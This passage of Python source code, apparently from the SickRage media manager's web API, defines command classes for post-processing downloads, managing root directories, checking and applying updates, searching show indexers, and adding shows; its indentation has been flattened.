elif last_line:
final_data.append("AA" + x)
num_lines += 1
if num_lines >= num_to_show:
break
return _responds(RESULT_SUCCESS, final_data)
class CMD_PostProcess(ApiCall):
_help = {
"desc": "Manually post-process the files in the download folder",
"optionalParameters": {
"path": {"desc": "The path to the folder to post-process"},
"force_replace": {"desc": "Force already post-processed files to be post-processed again"},
"return_data": {"desc": "Returns the result of the post-process"},
"process_method": {"desc": "How should valid post-processed files be handled"},
"is_priority": {"desc": "Replace the file even if it exists in a higher quality"},
"failed": {"desc": "Mark download as failed"},
"type": {"desc": "The type of post-process being requested"},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.path, args = self.check_params(args, kwargs, "path", None, False, "string", [])
self.force_replace, args = self.check_params(args, kwargs, "force_replace", False, False, "bool", [])
self.return_data, args = self.check_params(args, kwargs, "return_data", False, False, "bool", [])
self.process_method, args = self.check_params(args, kwargs, "process_method", False, False, "string",
["copy", "symlink", "hardlink", "move"])
self.is_priority, args = self.check_params(args, kwargs, "is_priority", False, False, "bool", [])
self.failed, args = self.check_params(args, kwargs, "failed", False, False, "bool", [])
self.type, args = self.check_params(args, kwargs, "type", "auto", None, "string", ["auto", "manual"])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Manually post-process the files in the download folder """
if not self.path and not sickbeard.TV_DOWNLOAD_DIR:
return _responds(RESULT_FAILURE, msg="You need to provide a path or set TV Download Dir")
if not self.path:
self.path = sickbeard.TV_DOWNLOAD_DIR
if not self.type:
self.type = 'manual'
data = processTV.processDir(self.path, process_method=self.process_method, force=self.force_replace,
is_priority=self.is_priority, failed=self.failed, proc_type=self.type)
if not self.return_data:
data = ""
return _responds(RESULT_SUCCESS, data=data, msg="Started post-process for %s" % self.path)
class CMD_SickBeard(ApiCall):
_help = {"desc": "Get miscellaneous information about SickRage"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" dGet miscellaneous information about SickRage """
data = {"sr_version": sickbeard.BRANCH, "api_version": self.version,
"api_commands": sorted(function_mapper.keys())}
return _responds(RESULT_SUCCESS, data)
class CMD_SickBeardAddRootDir(ApiCall):
_help = {
"desc": "Add a new root (parent) directory to SickRage",
"requiredParameters": {
"location": {"desc": "The full path to the new root (parent) directory"},
},
"optionalParameters": {
"default": {"desc": "Make this new location the default root (parent) directory"},
}
}
def __init__(self, args, kwargs):
# required
self.location, args = self.check_params(args, kwargs, "location", None, True, "string", [])
# optional
self.default, args = self.check_params(args, kwargs, "default", False, False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Add a new root (parent) directory to SickRage """
self.location = urllib.unquote_plus(self.location)
location_matched = 0
index = 0
# disallow adding/setting an invalid dir
if not ek(os.path.isdir, self.location):
return _responds(RESULT_FAILURE, msg="Location is invalid")
root_dirs = []
if sickbeard.ROOT_DIRS == "":
self.default = 1
else:
root_dirs = sickbeard.ROOT_DIRS.split('|')
index = int(sickbeard.ROOT_DIRS.split('|')[0])
root_dirs.pop(0)
# clean up the list - replace %xx escapes by their single-character equivalent
root_dirs = [urllib.unquote_plus(x) for x in root_dirs]
for x in root_dirs:
if x == self.location:
location_matched = 1
if self.default == 1:
index = root_dirs.index(self.location)
break
if location_matched == 0:
if self.default == 1:
root_dirs.insert(0, self.location)
else:
root_dirs.append(self.location)
root_dirs_new = [urllib.unquote_plus(x) for x in root_dirs]
root_dirs_new.insert(0, index)
root_dirs_new = '|'.join(unicode(x) for x in root_dirs_new)
sickbeard.ROOT_DIRS = root_dirs_new
return _responds(RESULT_SUCCESS, _get_root_dirs(), msg="Root directories updated")
class CMD_SickBeardCheckVersion(ApiCall):
_help = {"desc": "Check if a new version of SickRage is available"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
check_version = CheckVersion()
needs_update = check_version.check_for_new_version()
data = {
"current_version": {
"branch": check_version.get_branch(),
"commit": check_version.updater.get_cur_commit_hash(),
"version": check_version.updater.get_cur_version(),
},
"latest_version": {
"branch": check_version.get_branch(),
"commit": check_version.updater.get_newest_commit_hash(),
"version": check_version.updater.get_newest_version(),
},
"commits_offset": check_version.updater.get_num_commits_behind(),
"needs_update": needs_update,
}
return _responds(RESULT_SUCCESS, data)
class CMD_SickBeardCheckScheduler(ApiCall):
_help = {"desc": "Get information about the scheduler"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get information about the scheduler """
my_db = db.DBConnection()
sql_results = my_db.select("SELECT last_backlog FROM info")
backlog_paused = sickbeard.searchQueueScheduler.action.is_backlog_paused() # @UndefinedVariable
backlog_running = sickbeard.searchQueueScheduler.action.is_backlog_in_progress() # @UndefinedVariable
next_backlog = sickbeard.backlogSearchScheduler.nextRun().strftime(dateFormat).decode(sickbeard.SYS_ENCODING)
data = {"backlog_is_paused": int(backlog_paused), "backlog_is_running": int(backlog_running),
"last_backlog": _ordinal_to_date_form(sql_results[0]["last_backlog"]),
"next_backlog": next_backlog}
return _responds(RESULT_SUCCESS, data)
class CMD_SickBeardDeleteRootDir(ApiCall):
_help = {
"desc": "Delete a root (parent) directory from SickRage",
"requiredParameters": {
"location": {"desc": "The full path to the root (parent) directory to remove"},
}
}
def __init__(self, args, kwargs):
# required
self.location, args = self.check_params(args, kwargs, "location", None, True, "string", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Delete a root (parent) directory from SickRage """
if sickbeard.ROOT_DIRS == "":
return _responds(RESULT_FAILURE, _get_root_dirs(), msg="No root directories detected")
new_index = 0
root_dirs_new = []
root_dirs = sickbeard.ROOT_DIRS.split('|')
index = int(root_dirs[0])
root_dirs.pop(0)
# clean up the list - replace %xx escapes by their single-character equivalent
root_dirs = [urllib.unquote_plus(x) for x in root_dirs]
old_root_dir = root_dirs[index]
for curRootDir in root_dirs:
if not curRootDir == self.location:
root_dirs_new.append(curRootDir)
else:
new_index = 0
for curIndex, curNewRootDir in enumerate(root_dirs_new):
if curNewRootDir is old_root_dir:
new_index = curIndex
break
root_dirs_new = [urllib.unquote_plus(x) for x in root_dirs_new]
if len(root_dirs_new) > 0:
root_dirs_new.insert(0, new_index)
root_dirs_new = "|".join(unicode(x) for x in root_dirs_new)
sickbeard.ROOT_DIRS = root_dirs_new
# what if the root dir was not found?
return _responds(RESULT_SUCCESS, _get_root_dirs(), msg="Root directory deleted")
class CMD_SickBeardGetDefaults(ApiCall):
_help = {"desc": "Get SickRage's user default configuration value"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get SickRage's user default configuration value """
any_qualities, best_qualities = _map_quality(sickbeard.QUALITY_DEFAULT)
data = {"status": statusStrings[sickbeard.STATUS_DEFAULT].lower(),
"flatten_folders": int(sickbeard.FLATTEN_FOLDERS_DEFAULT), "initial": any_qualities,
"archive": best_qualities, "future_show_paused": int(sickbeard.COMING_EPS_DISPLAY_PAUSED)}
return _responds(RESULT_SUCCESS, data)
class CMD_SickBeardGetMessages(ApiCall):
_help = {"desc": "Get all messages"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
messages = []
for cur_notification in ui.notifications.get_notifications(self.rh.request.remote_ip):
messages.append({"title": cur_notification.title,
"message": cur_notification.message,
"type": cur_notification.type})
return _responds(RESULT_SUCCESS, messages)
class CMD_SickBeardGetRootDirs(ApiCall):
_help = {"desc": "Get all root (parent) directories"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get all root (parent) directories """
return _responds(RESULT_SUCCESS, _get_root_dirs())
class CMD_SickBeardPauseBacklog(ApiCall):
_help = {
"desc": "Pause or un-pause the backlog search",
"optionalParameters": {
"pause ": {"desc": "True to pause the backlog search, False to un-pause it"}
}
}
def __init__(self, args, kwargs):
# required
# optional
self.pause, args = self.check_params(args, kwargs, "pause", False, False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Pause or un-pause the backlog search """
if self.pause:
sickbeard.searchQueueScheduler.action.pause_backlog() # @UndefinedVariable
return _responds(RESULT_SUCCESS, msg="Backlog paused")
else:
sickbeard.searchQueueScheduler.action.unpause_backlog() # @UndefinedVariable
return _responds(RESULT_SUCCESS, msg="Backlog un-paused")
class CMD_SickBeardPing(ApiCall):
_help = {"desc": "Ping SickRage to check if it is running"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Ping SickRage to check if it is running """
if sickbeard.started:
return _responds(RESULT_SUCCESS, {"pid": sickbeard.PID}, "Pong")
else:
return _responds(RESULT_SUCCESS, msg="Pong")
class CMD_SickBeardRestart(ApiCall):
_help = {"desc": "Restart SickRage"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Restart SickRage """
if not Restart.restart(sickbeard.PID):
return _responds(RESULT_FAILURE, msg='SickRage can not be restarted')
return _responds(RESULT_SUCCESS, msg="SickRage is restarting...")
class CMD_SickBeardSearchIndexers(ApiCall):
_help = {
"desc": "Search for a show with a given name on all the indexers, in a specific language",
"optionalParameters": {
"name": {"desc": "The name of the show you want to search for"},
"indexerid": {"desc": "Unique ID of a show"},
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"lang": {"desc": "The 2-letter language code of the desired show"},
}
}
def __init__(self, args, kwargs):
self.valid_languages = sickbeard.indexerApi().config['langabbv_to_id']
# required
# optional
self.name, args = self.check_params(args, kwargs, "name", None, False, "string", [])
self.lang, args = self.check_params(args, kwargs, "lang", sickbeard.INDEXER_DEFAULT_LANGUAGE, False, "string",
self.valid_languages.keys())
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, False, "int", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Search for a show with a given name on all the indexers, in a specific language """
results = []
lang_id = self.valid_languages[self.lang]
if self.name and not self.indexerid: # only name was given
for _indexer in sickbeard.indexerApi().indexers if self.indexer == 0 else [int(self.indexer)]:
indexer_api_params = sickbeard.indexerApi(_indexer).api_params.copy()
if self.lang and not self.lang == sickbeard.INDEXER_DEFAULT_LANGUAGE:
indexer_api_params['language'] = self.lang
indexer_api_params['actors'] = False
indexer_api_params['custom_ui'] = classes.AllShowsListUI
t = sickbeard.indexerApi(_indexer).indexer(**indexer_api_params)
try:
api_data = t[str(self.name).encode()]
except (sickbeard.indexer_shownotfound, sickbeard.indexer_showincomplete, sickbeard.indexer_error):
logger.log(u"API :: Unable to find show with id " + str(self.indexerid), logger.WARNING)
continue
for curSeries in api_data:
results.append({indexer_ids[_indexer]: int(curSeries['id']),
"name": curSeries['seriesname'],
"first_aired": curSeries['firstaired'],
"indexer": int(_indexer)})
return _responds(RESULT_SUCCESS, {"results": results, "langid": lang_id})
elif self.indexerid:
for _indexer in sickbeard.indexerApi().indexers if self.indexer == 0 else [int(self.indexer)]:
indexer_api_params = sickbeard.indexerApi(_indexer).api_params.copy()
if self.lang and not self.lang == sickbeard.INDEXER_DEFAULT_LANGUAGE:
indexer_api_params['language'] = self.lang
indexer_api_params['actors'] = False
t = sickbeard.indexerApi(_indexer).indexer(**indexer_api_params)
try:
my_show = t[int(self.indexerid)]
except (sickbeard.indexer_shownotfound, sickbeard.indexer_showincomplete, sickbeard.indexer_error):
logger.log(u"API :: Unable to find show with id " + str(self.indexerid), logger.WARNING)
return _responds(RESULT_SUCCESS, {"results": [], "langid": lang_id})
if not my_show.data['seriesname']:
logger.log(
u"API :: Found show with indexerid: " + str(
self.indexerid) + ", however it contained no show name", logger.DEBUG)
return _responds(RESULT_FAILURE, msg="Show contains no name, invalid result")
# found show
results = [{indexer_ids[_indexer]: int(my_show.data['id']),
"name": unicode(my_show.data['seriesname']),
"first_aired": my_show.data['firstaired'],
"indexer": int(_indexer)}]
break
return _responds(RESULT_SUCCESS, {"results": results, "langid": lang_id})
else:
return _responds(RESULT_FAILURE, msg="Either a unique id or name is required!")
class CMD_SickBeardSearchTVDB(CMD_SickBeardSearchIndexers):
_help = {
"desc": "Search for a show with a given name on The TVDB, in a specific language",
"optionalParameters": {
"name": {"desc": "The name of the show you want to search for"},
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"lang": {"desc": "The 2-letter language code of the desired show"},
}
}
def __init__(self, args, kwargs):
CMD_SickBeardSearchIndexers.__init__(self, args, kwargs)
self.indexerid, args = self.check_params(args, kwargs, "tvdbid", None, False, "int", [])
class CMD_SickBeardSearchTVRAGE(CMD_SickBeardSearchIndexers):
"""
Deprecated, TVRage is no more.
"""
_help = {
"desc":
"Search for a show with a given name on TVRage, in a specific language. "
"This command should not longer be used, as TVRage was shut down.",
"optionalParameters": {
"name": {"desc": "The name of the show you want to search for"},
"lang": {"desc": "The 2-letter language code of the desired show"},
}
}
def __init__(self, args, kwargs):
# Leave this one as APICall so it doesnt try and search anything
# pylint: disable=W0233,W0231
ApiCall.__init__(self, args, kwargs)
def run(self):
return _responds(RESULT_FAILURE, msg="TVRage is no more, invalid result")
class CMD_SickBeardSetDefaults(ApiCall):
_help = {
"desc": "Set SickRage's user default configuration value",
"optionalParameters": {
"initial": {"desc": "The initial quality of a show"},
"archive": {"desc": "The archive quality of a show"},
"future_show_paused": {"desc": "True to list paused shows in the coming episode, False otherwise"},
"flatten_folders": {"desc": "Flatten sub-folders within the show directory"},
"status": {"desc": "Status of missing episodes"},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.initial, args = self.check_params(args, kwargs, "initial", None, False, "list",
["sdtv", "sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl", "hdbluray", "fullhdbluray", "unknown"])
self.archive, args = self.check_params(args, kwargs, "archive", None, False, "list",
["sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl", "hdbluray", "fullhdbluray"])
self.future_show_paused, args = self.check_params(args, kwargs, "future_show_paused", None, False, "bool", [])
self.flatten_folders, args = self.check_params(args, kwargs, "flatten_folders", None, False, "bool", [])
self.status, args = self.check_params(args, kwargs, "status", None, False, "string",
["wanted", "skipped", "ignored"])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Set SickRage's user default configuration value """
quality_map = {'sdtv': Quality.SDTV,
'sddvd': Quality.SDDVD,
'hdtv': Quality.HDTV,
'rawhdtv': Quality.RAWHDTV,
'fullhdtv': Quality.FULLHDTV,
'hdwebdl': Quality.HDWEBDL,
'fullhdwebdl': Quality.FULLHDWEBDL,
'hdbluray': Quality.HDBLURAY,
'fullhdbluray': Quality.FULLHDBLURAY,
'unknown': Quality.UNKNOWN}
i_quality_id = []
a_quality_id = []
if self.initial:
for quality in self.initial:
i_quality_id.append(quality_map[quality])
if self.archive:
for quality in self.archive:
a_quality_id.append(quality_map[quality])
if i_quality_id or a_quality_id:
sickbeard.QUALITY_DEFAULT = Quality.combineQualities(i_quality_id, a_quality_id)
if self.status:
# convert the string status to a int
for status in statusStrings:
if statusStrings[status].lower() == str(self.status).lower():
self.status = status
break
# this should be obsolete because of the above
if self.status not in statusStrings:
raise ApiError("Invalid Status")
# only allow the status options we want
if int(self.status) not in (3, 5, 6, 7):
raise ApiError("Status Prohibited")
sickbeard.STATUS_DEFAULT = self.status
if self.flatten_folders is not None:
sickbeard.FLATTEN_FOLDERS_DEFAULT = int(self.flatten_folders)
if self.future_show_paused is not None:
sickbeard.COMING_EPS_DISPLAY_PAUSED = int(self.future_show_paused)
return _responds(RESULT_SUCCESS, msg="Saved defaults")
class CMD_SickBeardShutdown(ApiCall):
_help = {"desc": "Shutdown SickRage"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Shutdown SickRage """
if not Shutdown.stop(sickbeard.PID):
return _responds(RESULT_FAILURE, msg='SickRage can not be shut down')
return _responds(RESULT_SUCCESS, msg="SickRage is shutting down...")
class CMD_SickBeardUpdate(ApiCall):
_help = {"desc": "Update SickRage to the latest version available"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
check_version = CheckVersion()
if check_version.check_for_new_version():
if check_version.run_backup_if_safe():
check_version.update()
return _responds(RESULT_SUCCESS, msg="SickRage is updating ...")
return _responds(RESULT_FAILURE, msg="SickRage could not backup config ...")
return _responds(RESULT_FAILURE, msg="SickRage is already up to date")
class CMD_Show(ApiCall):
_help = {
"desc": "Get detailed information about a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get detailed information about a show """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
show_dict = {
"season_list": CMD_ShowSeasonList((), {"indexerid": self.indexerid}).run()["data"],
"cache": CMD_ShowCache((), {"indexerid": self.indexerid}).run()["data"]
}
genre_list = []
if show_obj.genre:
genre_list_tmp = show_obj.genre.split("|")
for genre in genre_list_tmp:
if genre:
genre_list.append(genre)
show_dict["genre"] = genre_list
show_dict["quality"] = get_quality_string(show_obj.quality)
any_qualities, best_qualities = _map_quality(show_obj.quality)
show_dict["quality_details"] = {"initial": any_qualities, "archive": best_qualities}
try:
show_dict["location"] = show_obj.location
except ShowDirectoryNotFoundException:
show_dict["location"] = ""
show_dict["language"] = show_obj.lang
show_dict["show_name"] = show_obj.name
show_dict["paused"] = (0, 1)[show_obj.paused]
show_dict["subtitles"] = (0, 1)[show_obj.subtitles]
show_dict["air_by_date"] = (0, 1)[show_obj.air_by_date]
show_dict["flatten_folders"] = (0, 1)[show_obj.flatten_folders]
show_dict["sports"] = (0, 1)[show_obj.sports]
show_dict["anime"] = (0, 1)[show_obj.anime]
show_dict["airs"] = str(show_obj.airs).replace('am', ' AM').replace('pm', ' PM').replace(' ', ' ')
show_dict["dvdorder"] = (0, 1)[show_obj.dvdorder]
if show_obj.rls_require_words:
show_dict["rls_require_words"] = show_obj.rls_require_words.split(", ")
else:
show_dict["rls_require_words"] = []
if show_obj.rls_ignore_words:
show_dict["rls_ignore_words"] = show_obj.rls_ignore_words.split(", ")
else:
show_dict["rls_ignore_words"] = []
show_dict["scene"] = (0, 1)[show_obj.scene]
show_dict["archive_firstmatch"] = (0, 1)[show_obj.archive_firstmatch]
show_dict["indexerid"] = show_obj.indexerid
show_dict["tvdbid"] = helpers.mapIndexersToShow(show_obj)[1]
show_dict["imdbid"] = show_obj.imdbid
show_dict["network"] = show_obj.network
if not show_dict["network"]:
show_dict["network"] = ""
show_dict["status"] = show_obj.status
if helpers.tryInt(show_obj.nextaired, 1) > 693595:
dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting(
network_timezones.parse_date_time(show_obj.nextaired, show_dict['airs'], show_dict['network']))
show_dict['airs'] = sbdatetime.sbdatetime.sbftime(dt_episode_airs, t_preset=timeFormat).lstrip('0').replace(
' 0', ' ')
show_dict['next_ep_airdate'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat)
else:
show_dict['next_ep_airdate'] = ''
return _responds(RESULT_SUCCESS, show_dict)
class CMD_ShowAddExisting(ApiCall):
_help = {
"desc": "Add an existing show in SickRage",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
"location": {"desc": "Full path to the existing shows's folder"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"initial": {"desc": "The initial quality of the show"},
"archive": {"desc": "The archive quality of the show"},
"flatten_folders": {"desc": "True to flatten the show folder, False otherwise"},
"subtitles": {"desc": "True to search for subtitles, False otherwise"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "", [])
self.location, args = self.check_params(args, kwargs, "location", None, True, "string", [])
# optional
self.initial, args = self.check_params(args, kwargs, "initial", None, False, "list",
["sdtv", "sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl", "hdbluray", "fullhdbluray", "unknown"])
self.archive, args = self.check_params(args, kwargs, "archive", None, False, "list",
["sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl", "hdbluray", "fullhdbluray"])
self.flatten_folders, args = self.check_params(args, kwargs, "flatten_folders",
bool(sickbeard.FLATTEN_FOLDERS_DEFAULT), False, "bool", [])
self.subtitles, args = self.check_params(args, kwargs, "subtitles", int(sickbeard.USE_SUBTITLES),
False, "int", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Add an existing show in SickRage """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if show_obj:
return _responds(RESULT_FAILURE, msg="An existing indexerid already exists in the database")
if not ek(os.path.isdir, self.location):
return _responds(RESULT_FAILURE, msg='Not a valid location')
indexer_name = None
indexer_result = CMD_SickBeardSearchIndexers([], {indexer_ids[self.indexer]: self.indexerid}).run()
if indexer_result['result'] == result_type_map[RESULT_SUCCESS]:
if not indexer_result['data']['results']:
return _responds(RESULT_FAILURE, msg="Empty results returned, check indexerid and try again")
if len(indexer_result['data']['results']) == 1 and 'name' in indexer_result['data']['results'][0]:
indexer_name = indexer_result['data']['results'][0]['name']
if not indexer_name:
return _responds(RESULT_FAILURE, msg="Unable to retrieve information from indexer")
# set indexer so we can pass it along when adding show to SR
indexer = indexer_result['data']['results'][0]['indexer']
quality_map = {'sdtv': Quality.SDTV,
'sddvd': Quality.SDDVD,
'hdtv': Quality.HDTV,
'rawhdtv': Quality.RAWHDTV,
'fullhdtv': Quality.FULLHDTV,
'hdwebdl': Quality.HDWEBDL,
'fullhdwebdl': Quality.FULLHDWEBDL,
'hdbluray': Quality.HDBLURAY,
'fullhdbluray': Quality.FULLHDBLURAY,
'unknown': Quality.UNKNOWN}
# use default quality as a fail-safe
new_quality = int(sickbeard.QUALITY_DEFAULT)
i_quality_id = []
a_quality_id = []
if self.initial:
for quality in self.initial:
i_quality_id.append(quality_map[quality])
if self.archive:
for quality in self.archive:
a_quality_id.append(quality_map[quality])
if i_quality_id or a_quality_id:
new_quality = Quality.combineQualities(i_quality_id, a_quality_id)
sickbeard.showQueueScheduler.action.addShow(
int(indexer), int(self.indexerid), self.location, default_status=sickbeard.STATUS_DEFAULT,
quality=new_quality, flatten_folders=int(self.flatten_folders), subtitles=self.subtitles,
default_status_after=sickbeard.STATUS_DEFAULT_AFTER, archive=self.archive_firstmatch
)
return _responds(RESULT_SUCCESS, {"name": indexer_name}, indexer_name + " has been queued to be added")
class CMD_ShowAddNew(ApiCall):
_help = {
"desc": "Add a new show to SickRage",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"initial": {"desc": "The initial quality of the show"},
"location": {"desc": "The path to the folder where the show should be created"},
"archive": {"desc": "The archive quality of the show"},
"flatten_folders": {"desc": "True to flatten the show folder, False otherwise"},
"status": {"desc": "The status of missing episodes"},
"lang": {"desc": "The 2-letter language code of the desired show"},
"subtitles": {"desc": "True to search for subtitles, False otherwise"},
"anime": {"desc": "True to mark the show as an anime, False otherwise"},
"scene": {"desc": "True if episodes search should be made by scene numbering, False otherwise"},
"future_status": {"desc": "The status of future episodes"},
"archive_firstmatch": {
"desc": "True if episodes should be archived when first match is downloaded, False otherwise"
},
}
}
def __init__(self, args, kwargs):
self.valid_languages = sickbeard.indexerApi().config['langabbv_to_id']
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
self.location, args = self.check_params(args, kwargs, "location", None, False, "string", [])
self.initial, args = self.check_params(args, kwargs, "initial", None, False, "list",
["sdtv", "sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl", "hdbluray", "fullhdbluray", "unknown"])
self.archive, args = self.check_params(args, kwargs, "archive", None, False, "list",
["sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl", "hdbluray", "fullhdbluray"])
self.flatten_folders, args = self.check_params(args, kwargs, "flatten_folders",
bool(sickbeard.FLATTEN_FOLDERS_DEFAULT), False, "bool", [])
self.status, args = self.check_params(args, kwargs, "status", None, False, "string",
["wanted", "skipped", "ignored"])
self.lang, args = self.check_params(args, kwargs, "lang", sickbeard.INDEXER_DEFAULT_LANGUAGE, False, "string",
self.valid_languages.keys())
self.subtitles, args = self.check_params(args, kwargs, "subtitles", bool(sickbeard.USE_SUBTITLES),
False, "bool", [])
self.anime, args = self.check_params(args, kwargs, "anime", bool(sickbeard.ANIME_DEFAULT), False,
"bool", [])
self.scene, args = self.check_params(args, kwargs, "scene", bool(sickbeard.SCENE_DEFAULT), False,
"bool", [])
self.future_status, args = self.check_params(args, kwargs, "future_status", None, False, "string",
["wanted", "skipped", "ignored"])
self.archive_firstmatch, args = self.check_params(args, kwargs, "archive_firstmatch",
bool(sickbeard.ARCHIVE_DEFAULT), False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Add a new show to SickRage """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if show_obj:
return _responds(RESULT_FAILURE, msg="An existing indexerid already exists in database")
if not self.location:
if sickbeard.ROOT_DIRS != "":
root_dirs = sickbeard.ROOT_DIRS.split('|')
root_dirs.pop(0)
default_index = int(sickbeard.ROOT_DIRS.split('|')[0])
self.location = root_dirs[default_index]
else:
return _responds(RESULT_FAILURE, msg="Root directory is not set, please provide a location")
if not ek(os.path.isdir, self.location):
return _responds(RESULT_FAILURE, msg="'" + self.location + "' is not a valid location")
quality_map = {'sdtv': Quality.SDTV,
'sddvd': Quality.SDDVD,
'hdtv': Quality.HDTV,
'rawhdtv': Quality.RAWHDTV,
'fullhdtv': Quality.FULLHDTV,
'hdwebdl': Quality.HDWEBDL,
'fullhdwebdl': Quality.FULLHDWEBDL,
'hdbluray': Quality.HDBLURAY,
'fullhdbluray': Quality.FULLHDBLURAY,
'unknown': Quality.UNKNOWN}
# use default quality as a fail-safe
new_quality = int(sickbeard.QUALITY_DEFAULT)
i_quality_id = []
a_quality_id = []
if self.initial:
for quality in self.initial:
i_quality_id.append(quality_map[quality])
if self.archive:
for quality in self.archive:
a_quality_id.append(quality_map[quality])
if i_quality_id or a_quality_id:
new_quality = Quality.combineQualities(i_quality_id, a_quality_id)
# use default status as a fail-safe
new_status = sickbeard.STATUS_DEFAULT
if self.status:
# convert the string status to a int
for status in statusStrings:
if statusStrings[status].lower() == str(self.status).lower():
self.status = status
break
if self.status not in statusStrings:
raise ApiError("Invalid Status")
# only allow the status options we want
if int(self.status) not in (WANTED, SKIPPED, IGNORED):
return _responds(RESULT_FAILURE, msg="Status prohibited")
new_status = self.status
# use default status as a fail-safe
default_ep_status_after = sickbeard.STATUS_DEFAULT_AFTER
if self.future_status:
# convert the string status to a int
for status in statusStrings:
if statusStrings[status].lower() == str(self.future_status).lower():
self.future_status = status
break
if self.future_status not in statusStrings:
raise ApiError("Invalid Status")
# only allow the status options we want
if int(self.future_status) not in (WANTED, SKIPPED, IGNORED):
return _responds(RESULT_FAILURE, msg="Status prohibited")
default_ep_status_after = self.future_status
indexer_name = None
indexer_result = CMD_SickBeardSearchIndexers([], {indexer_ids[self.indexer]: self.indexerid}).run()
if indexer_result['result'] == result_type_map[RESULT_SUCCESS]:
if not indexer_result['data']['results']:
return _responds(RESULT_FAILURE, msg="Empty results returned, check indexerid and try again")
if len(indexer_result['data']['results']) == 1 and 'name' in indexer_result['data']['results'][0]:
indexer_name = indexer_result['data']['results'][0]['name']
if not indexer_name:
return _responds(RESULT_FAILURE, msg="Unable to retrieve information from indexer")
# set indexer for found show so we can pass it along
indexer = indexer_result['data']['results'][0]['indexer']
# moved the logic check to the end in an attempt to eliminate empty directory being created from previous errors
show_path = ek(os.path.join, self.location, sanitize_filename(indexer_name))
# don't create show dir if config says not to
if sickbeard.ADD_SHOWS_WO_DIR:
logger.log(u"Skipping initial creation of " + show_path + " due to config.ini setting")
else:
dir_exists = helpers.makeDir(show_path)
if not dir_exists:
logger.log(u"API :: Unable to create the folder " + show_path + ", can't add the show", logger.ERROR)
return _responds(RESULT_FAILURE, {"path": show_path},
"Unable to create the folder " + show_path + ", can't add the show")
else:
helpers.chmodAsParent(show_path)
sickbeard.showQueueScheduler.action.addShow(
int(indexer), int(self.indexerid), show_path, default_status=new_status, quality=new_quality,
flatten_folders=int(self.flatten_folders), lang=self.lang, subtitles=self.subtitles, anime=self.anime,
scene=self.scene, default_status_after=default_ep_status_after, archive=self.archive_firstmatch
)
return _responds(RESULT_SUCCESS, {"name": indexer_name}, indexer_name + " has been queued to be added")
class CMD_ShowCache(ApiCall):
_help = {
"desc": "Check SickRage's cache to see if the images (poster, banner, fanart) for a show are valid",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Check SickRage's cache to see if the images (poster, banner, fanart) for a show are valid """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
